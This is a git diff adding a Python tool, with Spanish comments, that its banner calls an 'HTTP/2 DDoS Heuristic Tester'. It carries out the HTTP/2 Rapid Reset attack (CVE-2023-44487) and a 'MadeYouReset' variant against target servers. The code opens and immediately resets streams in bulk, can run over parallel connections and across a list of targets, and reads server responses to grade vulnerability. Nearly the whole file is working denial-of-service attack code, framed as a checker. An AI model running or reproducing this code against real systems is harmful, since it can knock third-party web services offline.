diff --git a/.gitignore b/.gitignore index dd15ec4..9e604e8 100644 --- a/.gitignore +++ b/.gitignore @@ -25,6 +25,7 @@ share/python-wheels/ .installed.cfg *.egg MANIFEST +.DS_Store # PyInstaller # Usually these files are written by a python script from a template diff --git a/CVE-2025-25063.py b/CVE-2025-25063.py new file mode 100644 index 0000000..f7e9092 --- /dev/null +++ b/CVE-2025-25063.py @@ -0,0 +1,440 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import argparse +import ssl +import socket +import time +from urllib.parse import urlparse +from datetime import datetime +import json +import csv + +from h2.config import H2Configuration +from h2.connection import H2Connection +from h2.events import ( + SettingsAcknowledged, ConnectionTerminated, + PingAckReceived, WindowUpdated, RemoteSettingsChanged +) +from colorama import Fore, Style, init +init(autoreset=True) + +def print_banner(): + banner = f""" +{Fore.CYAN}{Style.BRIGHT} + + +╔╦╗┌─┐┌┬┐┌─┐╦ ╦┌─┐┬ ┬╦═╗┌─┐┌─┐┌─┐┌┬┐ +║║║├─┤ ││├┤ ╚╦╝│ ││ │╠╦╝├┤ └─┐├┤ │ +╩ ╩┴ ┴─┴┘└─┘ ╩ └─┘└─┘╩╚═└─┘└─┘└─┘ ┴ +{Style.RESET_ALL} + """ + print(banner) + print(f"{Fore.YELLOW}[ HTTP/2 DDoS Heuristic Tester | CVE-2023-44487 & CVE-2025-25063 ]{Style.RESET_ALL}\n") + print(f"{Fore.WHITE}[ m10sec@proton.me | m10sec 2025 ]{Style.RESET_ALL}\n") +def check_http2_support(host, port=443, tls=True, timeout=5.0): + """Devuelve True si el host negocia HTTP/2 vía ALPN.""" + try: + raw = socket.create_connection((host, port), timeout=timeout) + if tls: + ctx = ssl.create_default_context() + ctx.set_alpn_protocols(["h2", "http/1.1"]) # aceptar h2 si está disponible + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + s = ctx.wrap_socket(raw, server_hostname=host) + proto = s.selected_alpn_protocol() + s.close() + return proto == "h2" + else: + raw.close() + return False + except Exception: + return False + + +class H2Client: + def __init__(self, host, port, tls=True, server_name=None, timeout=6.0): + self.host = host + self.port = port + self.tls = tls + self.server_name = server_name or host + self.timeout = timeout + self.sock = None + self.conn = None + self.metrics = { + "goaway": 0, + "goaway_codes": [], + "rst_sent": 0, + "rst_rate_per_s": 0.0, + "streams_opened": 0, + "pings": 0, + "ping_rtt_ms": [], + "remote_max_concurrent_streams": None, + "throttled": False, + "errors": [] + } + + def _wrap_tls(self, raw): + ctx = ssl.create_default_context() + ctx.set_alpn_protocols(["h2"]) # Forzar ALPN h2 + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE # Cambia a CERT_REQUIRED si deseas validar + return ctx.wrap_socket(raw, server_hostname=self.server_name) + + def connect(self): + raw = socket.create_connection((self.host, self.port), timeout=self.timeout) + self.sock = self._wrap_tls(raw) if self.tls else raw + self.sock.settimeout(self.timeout) + cfg = H2Configuration(client_side=True, header_encoding="utf-8") + self.conn = H2Connection(config=cfg) + self.conn.initiate_connection() + self._send(self.conn.data_to_send()) + self._drain() + + def close(self): + try: + self.sock.close() + except Exception: + pass + + def _send(self, data: bytes): + if not data: + return + self.sock.sendall(data) + + def _drain(self, dur=0.01): + end = time.time() + dur + while time.time() < end: + try: + data = self.sock.recv(65535) + if not data: + break + events = self.conn.receive_data(data) + for ev in events: + if isinstance(ev, ConnectionTerminated): + self.metrics["goaway"] += 1 + self.metrics["goaway_codes"].append(ev.error_code) + if ev.error_code in (0xb, 0x1): # ENHANCE_YOUR_CALM / PROTOCOL_ERROR + self.metrics["throttled"] = True + elif isinstance(ev, RemoteSettingsChanged): + mcs = ev.changed_settings.get(0x3) # SETTINGS_MAX_CONCURRENT_STREAMS + if mcs: + self.metrics["remote_max_concurrent_streams"] = mcs.new_value + elif isinstance(ev, PingAckReceived): + try: + sent_ns = int.from_bytes(ev.ping_data, "big") + rtt_ms = (time.time_ns() - sent_ns) / 1e6 + self.metrics["ping_rtt_ms"].append(rtt_ms) + except Exception: + self.metrics["ping_rtt_ms"].append(-1) + self._send(self.conn.data_to_send()) + except socket.timeout: + break + except Exception as e: + self.metrics["errors"].append(str(e)) + break + + def ping(self): + from hyperframe.frame import PingFrame + pf = PingFrame(0) + pf.opaque_data = int(time.time_ns()).to_bytes(8, "big") + self._send(pf.serialize()) + self.metrics["pings"] += 1 + self._drain(0.2) + + def rapid_reset(self, authority, path="/", n_streams=100, header_extra=None, pace_s=0.0): + """CVE-2023-44487 baseline: abre streams y los resetea inmediatamente.""" + headers_base = [ + (":method", "GET"), + (":authority", authority), + (":scheme", "https" if self.tls else "http"), + (":path", path), + ("user-agent", "h2-check/rr") + ] + if header_extra: + headers_base.extend(header_extra) + + start = time.time() + for _ in range(n_streams): + sid = self.conn.get_next_available_stream_id() + self.conn.send_headers(sid, headers_base, end_stream=True) + # Cierra vía state machine de hyper-h2 + self.conn.reset_stream(sid, error_code=0x8) # CANCEL + self._send(self.conn.data_to_send()) + self.metrics["rst_sent"] += 1 + self.metrics["streams_opened"] += 1 + self._drain(0.0) + if pace_s: + time.sleep(pace_s) + dur = max(0.001, time.time() - start) + self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur + self._drain(0.5) + + def made_you_reset_variation(self, authority, path="/", n_streams=100, jitter_ms=2): + """CVE-2025-25063 heurística: HEADERS end_stream=False + pequeño jitter y RST.""" + import random + headers_base = [ + (":method", "GET"), + (":authority", authority), + (":scheme", "https" if self.tls else "http"), + (":path", path), + ("user-agent", "h2-check/myr") + ] + start = time.time() + for i in range(n_streams): + sid = self.conn.get_next_available_stream_id() + self.conn.send_headers(sid, headers_base, end_stream=False) + self._send(self.conn.data_to_send()) + time.sleep(random.uniform(0, jitter_ms/1000.0)) + self.conn.reset_stream(sid, error_code=0x8) + self._send(self.conn.data_to_send()) + self.metrics["rst_sent"] += 1 + self.metrics["streams_opened"] += 1 + if i % 20 == 0: + self.ping() + self._drain(0.0) + dur = max(0.001, time.time() - start) + self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur + self._drain(0.8) + +def classify(metrics): + go_enhance = any(code == 0xb for code in metrics["goaway_codes"]) # ENHANCE_YOUR_CALM + high_rate = metrics["rst_rate_per_s"] > 500 + no_limits = (metrics["remote_max_concurrent_streams"] in (None, 0) or + (metrics["remote_max_concurrent_streams"] and metrics["remote_max_concurrent_streams"] > 1000)) + rtt_spikes = any(rtt > 200 for rtt in metrics["ping_rtt_ms"] if rtt >= 0) + + if not metrics["goaway"] and no_limits and high_rate and rtt_spikes: + verdict = "LIKELY_VULN" + elif not go_enhance and (high_rate or no_limits): + verdict = "POSSIBLE" + else: + verdict = "UNLIKELY" + return verdict + +def scan_for_vulnerability(target_url, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0): + """Devuelve un dict estilo resumen con soporte HTTP/2 y veredicto heurístico.""" + u = urlparse(target_url) + tls = (u.scheme == "https") + port = u.port or (443 if tls else 80) + authority = u.netloc.split(":")[0] + + http2_supported = check_http2_support(authority, port=port, tls=tls, timeout=timeout) + + result = { + "Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"), + "URL": target_url if u.scheme else f"https://{authority}", + "HTTP/2 Support": "Yes" if http2_supported else "No", + "Vulnerable": "UNKNOWN", + "Details": "No se pudo completar el análisis" + } + + if not http2_supported: + result["Details"] = "El servidor no negoció HTTP/2 (ALPN)." + return result + + c = H2Client(authority, port, tls=tls, server_name=authority, timeout=timeout) + try: + c.connect() + if mode in ("rapid", "both"): + c.rapid_reset(authority, path=u.path or "/", n_streams=streams, pace_s=pace) + if mode in ("myr", "both"): + c.made_you_reset_variation(authority, path=u.path or "/", n_streams=streams, jitter_ms=jitter) + verdict = classify(c.metrics) + mapping = {"LIKELY_VULN": "LIKELY", "POSSIBLE": "POSSIBLE", "UNLIKELY": "UNLIKELY"} + result["Vulnerable"] = mapping.get(verdict, verdict) + result["Details"] = ( + f"streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} " + f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} " + f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']}" + ) + except Exception as e: + result["Vulnerable"] = "UNKNOWN" + result["Details"] = f"Error durante prueba: {e}" + finally: + c.close() + + return result + + +def _normalize_target(s: str) -> str: + s = (s or "").strip() + if not s: + return s + if not s.startswith("http"): + s = "https://" + s + return s + + +def interactive_menu(): + print("\n=== HTTP/2 DDoS Heuristic Tester ===") + print("1) CVE-2023-44487 (Rapid Reset)") + print("2) CVE-2025-25063 (MadeYouReset)") + print("3) Ambos (comparativa)") + print("4) Salir") + choice = input("Selecciona opción [1-4]: ").strip() or "2" + if choice not in {"1","2","3"}: + print("Saliendo.") + return + + target = _normalize_target(input("Target (https://dominio o http://ip): ").strip()) + if not target: + print("No se ingresó target. Saliendo.") + return + + try: + streams = int((input("Streams por conexión [200]: ") or "200").strip()) + except Exception: + streams = 200 + try: + jitter = int((input("Jitter ms (solo MYR) [2]: ") or "2").strip()) + except Exception: + jitter = 2 + + mode = "rapid" if choice == "1" else ("myr" if choice == "2" else "both") + summary = scan_for_vulnerability(target, mode=mode, streams=streams, jitter=jitter) + print(json.dumps(summary, ensure_ascii=False, indent=2)) + +def bulk_scan_from_txt(path, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0, + out_json=None, out_csv=None, line_by_line=True): + """Lee un archivo TXT con un target por línea y escanea cada uno. + - Imprime 1 línea por resultado (NDJSON) para no saturar la salida. + - Si se especifica out_json, guarda un array JSON con todos los resultados. + - Si se especifica out_csv, guarda CSV con columnas fijas. + """ + results = [] + try: + with open(path, "r", encoding="utf-8") as f: + lines = [ln.strip() for ln in f if ln.strip() and not ln.strip().startswith("#")] + except Exception as e: + print(f"[!] No pude leer '{path}': {e}") + return + + for target in lines: + target_url = _normalize_target(target) + try: + res = scan_for_vulnerability(target_url, mode=mode, streams=streams, + timeout=timeout, jitter=jitter, pace=pace) + except Exception as e: + res = { + "Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"), + "URL": target_url, + "HTTP/2 Support": "UNKNOWN", + "Vulnerable": "UNKNOWN", + "Details": f"Error general: {e}" + } + results.append(res) + if line_by_line: + print(json.dumps(res, ensure_ascii=False)) + + if out_json: + try: + with open(out_json, "w", encoding="utf-8") as jf: + json.dump(results, jf, ensure_ascii=False, indent=2) + print(f"[+] Guardado JSON en {out_json}") + except Exception as e: + print(f"[!] No pude guardar JSON en {out_json}: {e}") + + if out_csv: + try: + with open(out_csv, "w", encoding="utf-8", newline="") as cf: + writer = csv.DictWriter(cf, fieldnames=["Timestamp","URL","HTTP/2 Support","Vulnerable","Details"]) + writer.writeheader() + for r in results: + writer.writerow(r) + print(f"[+] Guardado CSV en {out_csv}") + except Exception as e: + print(f"[!] No pude guardar CSV en {out_csv}: {e}") + + +# ----------------------------- +# Punto de entrada +# ----------------------------- + + +def main(): + print_banner() + + + + ap = argparse.ArgumentParser(description="HTTP/2 MadeYouReset heuristic checker") + ap.add_argument("target", nargs="?", help="URL objetivo, p.ej. https://example.com (opcional si usas --menu o --targets-file)") + ap.add_argument("--path", default="/", help="Ruta a solicitar") + ap.add_argument("--mode", choices=["rapid", "myr", "both"], default="myr", + help="Prueba: rapid (CVE-2023-44487), myr (CVE-2025-25063), both") + ap.add_argument("--conns", type=int, default=1, help="Conexiones paralelas") + ap.add_argument("--streams", type=int, default=200, help="Streams por conexión") + ap.add_argument("--timeout", type=float, default=6.0, help="Timeout socket") + ap.add_argument("--pace", type=float, default=0.0, help="Pausa entre streams (rapid)") + ap.add_argument("--jitter", type=int, default=2, help="Jitter ms (myr)") + ap.add_argument("--json", action="store_true", help="Salida JSON resumida (scan_for_vulnerability)") + ap.add_argument("--menu", action="store_true", help="Abrir menú interactivo") + ap.add_argument("--targets-file", help="Ruta a TXT con un target por línea (modo bulk)") + ap.add_argument("--out-json", help="Guardar resultados bulk en archivo JSON") + ap.add_argument("--out-csv", help="Guardar resultados bulk en archivo CSV") + args = ap.parse_args() + + # Agrego Bulk + if args.targets_file: + bulk_scan_from_txt( + args.targets_file, + mode=args.mode, + streams=args.streams, + timeout=args.timeout, + jitter=args.jitter, + pace=args.pace, + out_json=args.out_json, + out_csv=args.out_csv, + line_by_line=True, + ) + return + + # se activa el menu + if args.menu or not args.target: + interactive_menu() + return + + u = urlparse(args.target) + tls = (u.scheme == "https") + port = u.port or (443 if tls else 80) + authority = u.netloc.split(":")[0] + + if args.json: + summary = scan_for_vulnerability( + args.target, + mode=args.mode, + streams=args.streams, + timeout=args.timeout, + jitter=args.jitter, + pace=args.pace + ) + print(json.dumps(summary, ensure_ascii=False, indent=2)) + return + + clients = [] + for _ in range(args.conns): + c = H2Client(authority, port, tls=tls, server_name=authority, timeout=args.timeout) + c.connect() + clients.append(c) + + try: + for c in clients: + if args.mode in ("rapid", "both"): + c.rapid_reset(authority, path=args.path, n_streams=args.streams, pace_s=args.pace) + if args.mode in ("myr", "both"): + c.made_you_reset_variation(authority, path=args.path, n_streams=args.streams, jitter_ms=args.jitter) + + print("\n=== Resultados ===") + for i, c in enumerate(clients, 1): + v = classify(c.metrics) + print(f"[Conn {i}] verdict={v} streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} " + f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} " + f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} " + f"rtt_ms={','.join(f'{x:.0f}' if x>=0 else '-' for x in c.metrics['ping_rtt_ms'])}") + finally: + for c in clients: + c.close() + + +if __name__ == "__main__": + main() diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..a87eb83 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,5 @@ +# requirements.txt +h2>=4.1.0 +hyperframe>=6.0.1 +hpack>=4.0.0 +colorama>=0.4.6 \ No newline at end of file